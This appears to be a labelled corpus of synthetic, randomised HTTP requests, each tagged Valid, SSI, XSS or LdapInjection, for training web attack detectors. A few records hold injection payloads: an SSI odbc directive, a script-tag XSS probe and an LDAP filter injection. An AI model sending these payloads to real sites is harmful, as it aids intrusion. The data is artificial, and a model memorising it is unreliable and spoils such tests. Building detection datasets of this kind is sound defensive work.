If-Range: *
Max-Forwards: 70
MIME-Version: 3.9
Pragma: c='rttmga'
Proxy-Authorization: Digest username="eru4bt"
Authorization: Digest uri=http://bUdIarge.org/po6eh11.jpg
Range: 60-4,2-51827,267858-0573
Referer: http://azeS.com/opiil50k/atlEps.mdb
TE: deflate
Trailer: Accept-Encoding
User-Agent: yzmxDjepEU http://www.dsNIiB.fr
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/9.9 www.ev4qtv.gif, 7.5 225.231.81.93
Transfer-Encoding: compress
Upgrade: brlae/8.4, ioi/7.9
Warning: 514 www.icma.htm "hi7rt2ysVtuMd6rAei" 
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23451
Start - Id: 25779
class: Valid
GET /VECZ/aometsp1y5zaspE/ruacitbey2sanpDu/Po8or/lSs98/mfZvc1d.8lkVmvcp0qu/mF_6nU@Y2JNI-nUPvizd/3air.css?htwr=%2BsadeleteIrrautoexecmalogobjectsobjecta&c3swmhMchleEagd=cTcnvsvyGedln&oNEen2s7o=tedpwlnuechoGvch&m54=9226&hoCctsrsstnssa1=o&geqteanstsE0a=frmLc0H2Ct&othmf6semishahs=vgNelno5titElyfer HTTP/1.1
Host: www.iniecyrswp.cz
Connection: cbmr
Accept: audio/basic
Accept-Charset: windows-1254;q=0.8
Accept-Encoding: identity, gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 20.96.248.211
Cookie: VAf5cjXQ=knMltcsrI;b3earHbR=3313260
Cookie2: $Version="788"
Date: Thu, 13 May 04 03:33:50 CET
ETag: "TkphxNdlE_AQ8J5ftEjn"
Expect: 100-continue
From: llantq@at3ooty.biz
If-Modified-Since: Thu, 08 Apr 04 10:22:53 GMT
If-Unmodified-Since: Wed, 22 Mar 06 03:07:46 GMT
If-Match: "2GDNiF1Ssw_bGhPA0"
If-None-Match: "8@8uzEzXkBBf4f5rr"
If-Range: *
Max-Forwards: 46
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest realm
Range: -02113
Referer: http://www.sqsvEbVe.net/wekms/oto3etp/lgax/yAqshel/eirlut3n.rar
TE: trailers,chunked
Trailer: Warning
User-Agent: Mozilla/0.2 (X11; U; SunOS sun4u 2.9; eo-7b; rv:3.2.9) Gecko/29017697
UA-CPU: Sparc
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: ntny/6.8 www.ooAfEs.jpg, HTTP/1.0 187.21.110.110, 69sa/9.4 195.33.209.188:4423
Transfer-Encoding: gzip
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25779
Start - Id: 40822
class: SSI
GET /xBEw_i_/sssmd/iMUASwPsYS7tFLBn/n7lp.B8pEZOkiWK8In/nsO-3iL/nQuafLz3z.XnoxLYVUz.shtml?lihaujtttian=%3C%21--%23odbc+++++statement++%3D%22select+tp%2C++++Li%2C++d9dee+from+erue1Tu+order++by+++++2%2C+++119%2C++++6%22++--%3E HTTP/1.0
Host: 180.186.108.253:5497
Connection: Fgad6v
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: rNt-kf;q=0.2, ErltiIo-rpile, eG-ro
Cache-Control: no-store
Client-ip: 112.193.38.195
Cookie: gWdtNteOmmsne4U=if2onoan;ihgeedrwoau=$8union$kt];gjs
Cookie2: $Version="76"
Date: Mon, 18 Jan 10 17:14:29 UTC
ETag: "ze8tP8YuldNjp2a4As6o"
Expect: lwro1wg
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sat, 12 Mar 05 02:41:44 CET
If-Match: "TrZaYg5._f@ouFd1lMcE"
If-None-Match: "bFwIfFTc_tTg-Gte-pq"
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 814
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: if5env ebtl=ueeojqn
Range: 90-,846222-
Referer: http://www.naoe.org/a9jmc/JSesvao.jpg
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: rWm6@BJo http://www.d5tf.net
UA-CPU: x86
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 047x242
Via: HTTP/2.7 3.125.13.112, 8.4 49.173.140.7:204, FTP/5.1 127.159.180.143
Transfer-Encoding: ltren; ineyrt=ltfgth
Upgrade: hete/2.5
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40822
Start - Id: 46565
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: www.wlcIt.it
Connection: ztxhe
Accept: text/*;q=0.1, text/xml;q=0.3
Accept-Charset: iso-10646-ucs-2;q=0.6, x-mac-chinesetrad;q=0.4, windows-1252;q=0.4
Accept-Encoding: compress, identity, deflate;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 236.99.76.50
Cookie: e0jvc=70
Cookie2: $Version="190"
Date: Fri, 16 May 08 10:55:50 CET
ETag: W/"VLhNzjc5io72QMe1b"
Expect: 100-continue
From: tbyn@cYcur1s.it
If-Modified-Since: Thu, 06 Dec 07 11:26:44 CET
If-Unmodified-Since: Mon, 10 Sep 07 12:37:35 GMT
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "69u0NfFF-E57tKGUX8FO"
If-Range: Thu, 05 Jul 07 03:58:18 UTC
Max-Forwards: 9055
MIME-Version: 1.3
Pragma: ac2=n
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest response="Bf1A17Db765F8d2b90ad86d1D0Ca6f27"
Range: 910-120,749-15173
Referer: http://www.OshD.uk/e7utc/adSc/rwly/ipsat.doc
TE: trailers,trailers
Trailer: Pragma
User-Agent: ooAQGO7i7 http://www.0ahAim.be
UA-CPU: x86
UA-Disp: 161,932,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 309x668
Via: 3.6 174.49.74.183
Transfer-Encoding: compress
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 136.226.21.172
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46565
Start - Id: 21908
class: Valid
GET /rARBp6rITbUIGUPyzzMd/Mnhttrfwea/dIk5la_y972Ta8lNZ/wYJyt@1OCO6LjbbXU/ePjbIjSlObZ6Fcc5UhZ/e2e5Do/cyoesazaq.jpeg? HTTP/1.1
Host: www.oohfroStO.be
Connection: eHco4
Accept: image/*;q=0.9, text/*
Accept-Charset: iso-8859-4, koi8;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 161.78.95.242
Cookie: tegibothf47irao=yecimtrd60et;wes=464186064;Pn1nlgt=Shtacceso o;jnt36htdiwTdia=177965;hZbtte=tsnpe;nsoaIdentcaly=mochahn$nanneitL
Cookie2: $Version="6"
Date: Mon, 12 Apr 04 03:22:27 CET
ETag: W/"jyia6FMrzJHk0QO"
Expect: ikrNu=mcnm
From: gspde@ia3eGzume.be
If-Modified-Since: Wed, 07 Dec 05 02:52:36 UTC
If-Unmodified-Since: Sat, 05 Jun 04 15:52:21 CET
If-Match: "1nE1ZDsnBW_-OdnedE"
If-None-Match: *
If-Range: "afgWZQa5DgARmxtclLw"
Max-Forwards: 7334
MIME-Version: 6.5
Pragma: vlder='r'
Proxy-Authorization: Digest opaque="2p0iEet"
Authorization: Digest algorithm=MD5-sess
Range: 3-,60614-,8615-29
Referer: http://eaqnc.st/eaede42a.conf
TE: trailers,trailers
Trailer: Referer
User-Agent: nAL225L http://www.r8chjye.biz
UA-CPU: PowerPC
UA-Disp: 9551,981,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 924x803
Via: FTP/5.8 13.96.50.205, 5rj/0.4 www.qstjs.tiff
Transfer-Encoding: deflate
Upgrade: etdaw/8.1, coe/5.4, 79eOoi/1.6, 3ean/3.4
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 3182273
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21908
Start - Id: 38852
class: LdapInjection
GET /TCsFEadminandTg2/dmVy-6L/auo/mr5at6dia0qs4X3sTsao.png?ems=iv&lgdbcm=sfswisatrmX&MGcdXz9NVFlike=oA1d6KEFGv&h08nittmoR1tprs=0uhd%29%28%26%28objectClass%3D+++gp*%29&icds7=sfto1mom0+pbgsound&xmtErk8hl6i=31002178&7rgnbr=aEceeashsrojkftt HTTP/1.0
Host: 153.118.8.140
Connection: close
Accept: audio/*, image/gif, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 149.133.119.108
Cookie: _oUauPeMDUR=41
Cookie2: $Version="36"
Date: Fri, 22 Apr 05 21:01:56 UTC
ETag: W/"q@gwKxzEx8Iq1.Wec@y"
Expect: beeepata=O503do;rmagetie
From: qneeyn@ecwmw.de
If-Modified-Since: Mon, 03 Aug 09 06:33:40 GMT
If-Unmodified-Since: Thu, 14 Oct 04 20:37:29 CET
If-Match: *
If-None-Match: "T4_zXOW8gGRpa2pA"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dGhseXVyT3NucGUzcmVsdGVtZnJ5bnRlZWQ4dG90bXdldG5vSGxpYw==
Range: -8
Referer: http://y8isSee.it/efsoecS4/ftrzAg.jpeg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.6 (Windows; U; Win98 1.2; se-om; rv:1.3.9) Gecko/36830808
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9479x714
Via: 9.2 www.EmfvseSe.shtml, 5.6 www.utme.png
Transfer-Encoding: compress
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38852
Start - Id: 5954
class: Valid
PUT /THaccess_log2VVall_gsaccept1qs/AZ0aaccess_logXJ-dlk-u7/mk7/eQMPt1LX/i@SyS7T/nGWiH/iHpkndHICXoCbmE/qFsCDxp./i1ef/awre6oThsuiifnsoi3/ANac2cn9fAo3pt1l/wbt.bin? HTTP/1.1
Content-Length: 286
Content-Language: bAsjs8,E,otesi7
Content-Encoding: gzip
Content-Location: /ieduoEf/petorolo/wwOojsm.cgi
Content-MD5: bjVvRXNsbHMwZXJ5c3NlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 May 09 13:34:15 UTC
Last-Modified: Wed, 18 Aug 04 12:02:38 CET
Host: 33.153.120.74
Connection: sSdeAr
Accept: */*;q=0.9
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=8
Client-ip: 255.92.138.163
Cookie: lpAyMr=s8;nahl0pelt=ea6dil's;attrovh=sOOINpive
Cookie2: $Version="344"
Date: Fri, 15 Oct 04 09:00:21 CET
ETag: W/"ZofDx5HpO_bdoX7MkU"
Expect: 100-continue
From: pe4asuz@ndPtobta.gov
If-Modified-Since: Tue, 12 Aug 08 21:44:00 GMT
If-Unmodified-Since: Tue, 16 Nov 04 13:57:34 UTC
If-Match: "eBpUZsKL.kZDWsT2_9xV"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 4.3
Pragma: don4In='yisi0ee7'
Proxy-Authorization: Digest realm
Authorization: Digest response="EFAcAD60bfa2540D71558FF16beFBBdD"
Range: 07726-6761,710997-63,-6296
Referer: http://www.perR.com/2IsnE8/0phe/aewaw/uetjlu/seuo9.swf
TE: chunked,chunked,trailers
Trailer: Connection
User-Agent: Mozilla/7.3 (compatible; MSIE 6.7; Windows NT; Edcsit)
UA-CPU: x86
UA-Disp: 407,032,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 457x9352
Via: 9.1 55.12.207.27, zal/0.4 www.eec3oas.gif, 4.4 244.0.13.213:819
Transfer-Encoding: deflate
Upgrade: treana/1.3, oher5/3.1
Warning: 151 www.2kIm.png "Nieie" 
X-Forwarded-For: 248.70.206.255
X-Serial-Number: 840738575772869612
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tdkifttolwthQt=tM_&-388@yV.Z=twoehas8mrEdg&Sl=ehv|e eaele0ayogbn&oe01u=ezew&TkhtcEs0r=03&tnsu7Uhb=<ehsDrea e6iN&fntn=hlh tam&Ztzwget=asNuqR_&nynennx=C&6Fk5I4PUDCN=GmzTah9raqneval%nuchild&htex2osel=[F~access_lognirpOrthrsheter&isj9hwhm=uiframeI-n adxaidn formb&endyb=0710607863

End - Id: 5954
Start - Id: 8651
class: Valid
GET /teTeislh/Ncxgnlxekeyerbmmm/eRfR/eII3uv/@hElp.css?9id=tNelsuitag&6ent7napnieel4=28480&aeadsepHim=eto1nrht&zt9jreayeinteg=nseahdshutdownl&2meotees=Ync%7C+tdirsincludei&Xbentpos=foseOxt&psSci=oaemep&heHeie=tmpb%3Frmh8ei&eeps=%5B&W17Vnetcat=a&aeaUpg=epeebm0zuc&oDcop=249671&t7tdoRhhh1cazeu=%3Acr2&sEsn9eme8ef7e=ta4a HTTP/1.0
Host: 136.124.229.208
Connection: itmX
Accept: */*
Accept-Charset: iso-8859-5;q=0.5, isiri-3342;q=0.3, macintosh;q=0.8, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: Atlt-tasDak, ed-bgE;q=0.0, M-dse8, ryth-tnsyod8p
Cache-Control: max-age=4
Client-ip: 177.129.186.148
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="6"
Date: Tue, 04 Jul 06 08:56:49 CET
ETag: "8vrFUpBbSL_gbSY"
Expect: 100-continue
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Sat, 31 May 08 13:05:38 UTC
If-Unmodified-Since: Fri, 05 Sep 08 02:08:43 CET
If-Match: *
If-None-Match: "d72lq62JDswe4Lmf33"
If-Range: Sun, 02 Jan 05 21:41:01 UTC
Max-Forwards: 7
MIME-Version: 4.8
Pragma: pgtet='3v'
Proxy-Authorization: Digest nc=ADd2Cfd8
Authorization: Uwdre aehanso=tetaMp
Range: -766,58-986789
Referer: http://eodciyY.cz/tnqbilsi/pawtsp.swf
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: tw9t (wsr.w@N; tTx7hQo; aA9sRC25; em_8RmZr18)
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8393x485
Via: 4.8 254.251.248.87:15, FTP/4.9 97.142.153.16, HTTP/7.6 71.107.165.222
Transfer-Encoding: identity
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8651
Start - Id: 24557
class: Valid
GET /yEMi/cGM-w8RIRNy8A/ersru3rjmixtnopm/S_IZhtacces.php? HTTP/1.0
Host: 27.187.34.49
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 55v-w
Cache-Control: only-if-cached
Client-ip: 194.37.152.82
Cookie: 8rembyopcs=5rwetie7Yel0;rcpCUDcat6TG=961;fothu=37051
Cookie2: $Version="50"
Date: Sat, 10 Jan 09 07:43:00 UTC
ETag: "QVnZ8zCBxshEkuVw4W5"
Expect: 100-continue
From: edfA@lkti.org
If-Modified-Since: Thu, 22 Nov 07 03:25:11 GMT
If-Unmodified-Since: Fri, 18 Nov 05 06:03:16 UTC
If-Match: "WlX7-dTry.2wCac-LDYe"
If-None-Match: "sVFt6ZytGHKA3hZGur"
If-Range: Thu, 02 Jul 09 18:07:01 GMT
Max-Forwards: 5746
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: nfijte ooosrt=8tertwFe
Authorization: Digest qop=auth-int
Range: 8-,-762016
Referer: /6doete/ecdEn.pl
TE: deflate,trailers,gzip;q=0.0
Trailer: Pragma
User-Agent: te8tmwd/6.5.2.3.5
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 049x0039
Via: 5.1 167.44.53.192
Transfer-Encoding: identity
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 365 www.TjEidce.css "nnOwneoaaooxsb" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24557
Start - Id: 1730
class: Valid
GET /Eeulg/iQ351Ig3JtP3/ar/baNqJjNoW3/5.AK-/hRAwj980.GEKnVbM8_ue/U4ai/nc7N@DMiNR/eq_tUDQuc073XCz.E6j.bin?SeM1menij=8345&tduoed=T0u9ak%3DnItai7%25&ntetsRbylq=4094&ch9zksh=25498&iplwoA5ecfi=oons7ny6rwrshavings+ HTTP/1.0
Host: www.A2ek.uk:80
Connection: orlhj
Accept: text/xml;q=0.2, application/zip;q=0.5, text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 109.240.50.123
Cookie: ag=6vans;fWesSee=ttkzdropaNtfs=du;ihadtincli=0080333;rNsraeio9ntd=1;TiOTei6uon8tadi=bHzg4Yq2
Cookie2: $Version="377"
Date: Sat, 18 Dec 04 11:52:16 UTC
ETag: W/"L7f1sN7yyH1pr8.R"
Expect: 100-continue
From: ylmul@hfldTeee2.org
If-Modified-Since: Mon, 20 Mar 06 17:37:12 GMT
If-Unmodified-Since: Fri, 09 Sep 05 19:08:48 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Jan 05 18:05:04 UTC
Max-Forwards: 7847
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: eahnhs rr6D=telemrl
Authorization: sdsDse tRVeaaf=Wrheen
Range: -37,450406-
Referer: http://ohqfca.biz/tee0g/E93h0Wbi/AnniStut.doc
TE: deflate;q=0.1,deflate
Trailer: If-Match
User-Agent: Mozilla/3.0 (X11; U; Linux i586 8.8; eo-in; rv:8.7.1) Gecko/27625235
UA-CPU: PowerPC
UA-Disp: 6638,4343,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6206x0801
Via: 3.2 233.150.129.172, 6.6 www.ihitp.shtml
Transfer-Encoding: identity
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 2051248263385180014
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1730
Start - Id: 24746
class: Valid
GET /jTC0uKH3Y79qiw/qaciv8e6dtnwhyaiEft9/izW2oodyR2-q4empBji6/C0qX9/Iart/7RscGlpassthruMWZ/aSeih2nrentseveol/7ForXjfuhpZ/ics1fehmITm94/4UvnlehHTS.hKszt.Nx/ayCc8bgRiG2re/sXZRxOTJqN.jpg?oy=aeo%3Ei%3A%7Ce&Tajp=882&zeaesRcliee1w=76252&aqinOtz=499263&tbrEontirmee=3ezzseenaiyrli0&xautoexecGTimg4=a%3CrtA&dhtemnoawurteem=sopt%5D&xde7lihWixbni9t=eeeg%7Ea&lvt9d7FgtGsuamn=36513512&VoBuo9=2s&prase=19103123&taewhaAc=caYetp2roAm HTTP/1.0
Host: 20.140.128.72
Connection: close
Accept: application/*;q=0.4
Accept-Charset: big5, windows-1254;q=0.1, iso-8859-5;q=0.2, koi8-r, x-mac-turkish;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: Lfe6tfl='ss3smtsa'
Client-ip: 113.251.255.211
Cookie: eafBesRress=39;DRNN=eetitnoretmzai;uolmaauepn5ct2=i$connect)iV0rfu;bncaaeiSyne=oapi
Cookie2: $Version="71"
Date: Thu, 14 Aug 08 12:50:53 CET
ETag: W/"hfpc@s08k8DrWdBh"
Expect: 100-continue
From: 4Pioe@levcc.org
If-Modified-Since: Wed, 12 Jan 05 18:00:48 UTC
If-Unmodified-Since: Fri, 11 Aug 06 24:13:35 CET
If-Match: "SD0NfJpICozGuYP"
If-None-Match: *
If-Range: Mon, 10 Mar 08 14:10:46 GMT
Max-Forwards: 285
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM a0ZwemhFeE9pc041aHNhQWhvZXJycGxpb2VyaW8wQ2VlaVZzZXdhWmg=
Authorization: Basic aG5kbTpkMGN3bWVtaQ==
Range: 991-
Referer: /fowiha/rtal6hs.cfm
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 1.4; ou-um; rv:3.3.3) Gecko/73357950
UA-CPU: StrongARM
UA-Disp: 572,4672,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 9.7 www.idanbGe.tiff:5, too/0.9 15.95.216.172
Transfer-Encoding: deflate
Upgrade: 0ms/1.3, awuais/6.3
Warning: 152 www.nuoOelo.jpg "ddh66yrn" "Wed, 01 Jun 05 18:22:47 UTC"
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 319119855540809
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24746
Start - Id: 6163
class: Valid
PUT /io..msf? HTTP/1.0
Content-Length: 233
Content-Language: as,n,e
Content-Encoding: compress
Content-Location: /tdlseShg/napl/remd.pdf
Content-MD5: cnllMGgzbzNhbm90bnNyRA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Oct 04 11:12:04 GMT
Last-Modified: Fri, 22 Aug 08 15:47:29 UTC
Host: www.lyt7cg.cz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1251;q=0.4, windows-1251;q=0.4, iso-8859-15;q=0.5
Accept-Encoding: identity, compress;q=0.6, gzip;q=0.7, identity
Accept-Language: *
Cache-Control: min-fresh=253
Client-ip: 9.57.64.76
Cookie: srdoNbmena=cWzyzutK;om7=xU_P;rwh1roNodssrc=255017
Cookie2: $Version="092"
Date: Thu, 20 Jan 05 17:01:55 UTC
ETag: "HK@tz3FVf0FTqFv"
Expect: ntotfl=tARTotmv
From: Rresc@lce6ce.org
If-Modified-Since: Wed, 20 Jan 10 18:33:01 UTC
If-Unmodified-Since: Tue, 25 Mar 08 03:09:01 CET
If-Match: "cpYC0mJ0xEp1ORC1b"
If-None-Match: "x4WVGBV75HqYCqKbYAOU"
If-Range: *
Max-Forwards: 81
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: Basic aDJmZmc6dW5kaG1w
Range: 611533-,1458-075
Referer: http://N0olrlt2.cz/5nenl/sdie/tBxiaAr/aex8bs/hsas.php4
TE: chunked;q=0.9,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.6 (compatible; MSIE 2.8; Open BSD i586; 2zami6ee)
UA-CPU: StrongARM
UA-Disp: 2552,3892,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3345x4822
Via: HTTP/4.5 38.119.127.248
Transfer-Encoding: lpPirz
Upgrade: hNeCe/7.2, uwoig/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jnaedlii0h=236&cnehuioh=P&0aa.ViframeapCMj2mocha=iFw&eeajmS=mopta5m2de'izt&c7U-TxetctS=openeme&ghsa9umTzteea=3238&0nab=awo&ryeZu=3j)d&0be6a7=52&wkao7beCatitkC=nchildnreval&iydtsa=ososhahocc&qaPz=wBabe&tet=$d&il=I'e9S(wo8uun

End - Id: 6163
Start - Id: 1223
class: Valid
GET /uptiaimarhihtuithhx/0RNYYmToIGTyoDF7l.js?qk99=8418784183&_9MxbexecGb=3frdllne&4hx7uigtw=oyAb0eorHorhHDrsm&eiateotsSzwLe=2176624&fMi3n0efct4y=45913&i1aziEfon=170530&shrpo=a&qIstyleuU703QUL=athPrbHzX&pewmsTsyesR=8&zutydaflslsnree=29147561&2uq85sosenals5l=cEi&anh4durfpnid=77987117&d5tDheluie=OtsrMtr1e0ee&nph-ULiAm3Xgar=475580 HTTP/1.1
Host: www.Esrrarhi.net:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: UtI43-nlRuo, tarn0Ro-ilae;q=0.9
Cache-Control: altgt='HY'
Client-ip: 29.124.118.33
Cookie: tgHRW9x6w_=t6ul;Q1nSesijtear=tFRe2httusioi;gcehvi=inputtD)rcpeo&aEHmu;onrim=tlftfh
Cookie2: $Version="21"
Date: Wed, 04 Nov 09 12:03:56 UTC
ETag: W/"YevtFmEp8x3YzhAZ2"
Expect: 100-continue
From: etwko@pistti5sr.st
If-Modified-Since: Mon, 17 Mar 08 19:11:47 GMT
If-Unmodified-Since: Wed, 19 Dec 07 20:35:41 GMT
If-Match: *
If-None-Match: "a1ixDZvzuCN0umEIO"
If-Range: Fri, 07 Jul 06 13:22:21 UTC
Max-Forwards: 4
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: tnehzy s1haSuth=gacolF
Authorization: Basic aXFvb2U6bWNvcg==
Range: -709
Referer: http://Bekn.biz/afuj/tims5otu/eteasa/zeawft/Lrqoe.bin
TE: trailers
Trailer: Transfer-Encoding
User-Agent: sit9yi8tdsjIg
UA-CPU: PowerPC
UA-Disp: 851,017,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6040x9780
Via: 3.2 219.244.236.122, FTP/5.3 66.67.211.238
Transfer-Encoding: compress
Upgrade: Tcnya/6.9, 3OlS9/8.0
Warning: 773 137.202.170.148 "wemeb1trtts" "Tue, 16 Oct 07 10:58:18 UTC"
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1223
Start - Id: 29964
class: Valid
GET /THhru1s/bfHZ/laast6fddsrdnsnronnj/D0xa4nodeh/atryhADyedmhs.cfm? HTTP/1.1
Host: www.6uawMOxeqd.be
Connection: sgtJss
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: mhrcbjOn-xulklLlI, c-xe46i
Cache-Control: max-age=590
Client-ip: 247.18.105.163
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="105"
Date: Wed, 04 Oct 06 16:34:02 GMT
ETag: "WSKwUwmVHZvpaf6vJTXZ"
Expect: rieTrx
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sat, 10 Mar 07 09:53:35 GMT
If-Unmodified-Since: Wed, 20 Jul 05 22:08:46 UTC
If-Match: "_5_V0ueH43PJar0D"
If-None-Match: "qYUF0-cAYnVbLMyu"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.1
Pragma: Ncd='1lnt0tdn'
Proxy-Authorization: NTLM c3JhZXRldG1iaW5Dbm15cXRubTVhaGFSOE5ubnRxeHRya01p
Authorization: Basic b29vbGVzOnhzdHJ2bk4=
Range: 054604-5
Referer: http://www.shaoa.ch/essre/npdi.pl
TE: deflate,trailers,trailers
Trailer: Cache-Control
User-Agent: xsosssSe6liresildg
UA-CPU: Sparc
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 797x977
Via: HTTP/8.9 www.ap9ki.css, 6.7 85.134.126.124
Transfer-Encoding: s1anE; ncutleNb=Gehn
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 223.222.247.27
X-Serial-Number: 95983
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

